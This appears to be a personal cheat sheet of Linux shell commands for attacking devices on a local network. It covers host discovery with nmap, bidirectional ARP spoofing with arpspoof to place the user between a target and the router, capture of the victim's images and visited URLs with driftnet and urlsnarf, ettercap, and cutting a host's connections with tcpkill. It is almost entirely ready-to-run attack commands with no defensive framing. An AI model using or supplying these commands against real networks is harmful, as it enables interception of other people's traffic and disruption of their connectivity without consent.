ArpSpoof
sudo apt-get install dsniff

NMAP
sudo apt-get install nmap
nmap 192.168.1.1/24 -n -sn -sP
	28:CF:E9:04:AB:D3 (Mac Mini)
	68:A8:6D:C8:E9:9C (iPhone)

ARPSPOOF & OTHERS
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 & arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
	driftnet -i eth0
	urlsnarf -i eth0
killall arpspoof

ETTERCAP
ettercap -G

TCPKILL
tcpkill -9 host www.minecraft.net or port 25565 
# skype 80 443
tcpkill ip host 192.168.1.2

WONDERSHAPER
apt-get install wondershaper
sudo wondershaper eth0 1024 128 
#kbits/s
wondershaper clear eth0
